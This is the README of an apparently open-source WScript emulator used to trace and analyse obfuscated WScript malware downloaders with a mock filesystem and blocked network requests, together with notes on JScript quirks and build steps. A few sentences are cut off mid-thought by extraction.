The following text is taken from https://github.com/mrpapercut/wscript:
If you were to use the WScript Emulator to analyse WScript-based malware downloaders, take all necessary precautions as you would for any other analysis. The emulator does not execute any HTTP-requests, registry changes or filesystem modifications, but you are still running a malicious file. Use only if you are confident (or confidently suspect) that the file is a WScript file, and always at your own risk.
The WScript Emulator contains a full code tracer, listing every class-construct, function call, getters & setters that occur while running a script. Even when the original script is 100% triple-obfuscated with JSFuck, it will trace all functions as if it weren't obfuscated at all.
In order to track creating/modifying/deleting files that would normally occur on the filesystem, the emulator contains a mock filesystem. This helps to easily see what the script would do to your filesystem if it was running in the normal WScript environment.
- ApplicationObject (Couldn't find documentation)
The emulator does not download any files when the original script calls for it. This is done for security reasons. It does show which URL is being requested and where the file would've been saved to in the VFS (but without the file's contents).
In addition to this, the emulator page removes
fetch from the global
window-object. It is easily replacable with other JS functionality though
JScript is Microsoft's flavour of the ECMAscript standard. This means that most ECMAscript rules still apply, but JScript's implementation in WScript is a bit different:
JScript in WScript is case-insensitive.
Regular JScript, like all ECMAscript variants, is case-sensitive (there is a difference between
true === -1
In WScript, false === 0, but true === ~false (-1). Because we cannot redefine
true === -1, please let me know.
- For use: any recent browser that supports the ES6 syntax and Proxy & Reflect objects. (Chrome >= 49.0, Firefox >= 42, Edge >= 14, Safari >= 10)
- For development: NodeJS >= 6.4
This package contains a full emulated version of WScript with 100% test coverage. Every file has been named as expected, every documented method has a link to the official WScript documentation describing what the feature should do. If you want to contribute to this project, please keep the following in mind:
- Every method should behave as identical as possible to original WScript code. See Microsoft's documentation for this
- Everything must be covered by tests
git clone https://github.com/mrpapercut/wscript.git cd wscript npm install npm run test-coverage npm run build
The HTML emulator can then be found in /dist/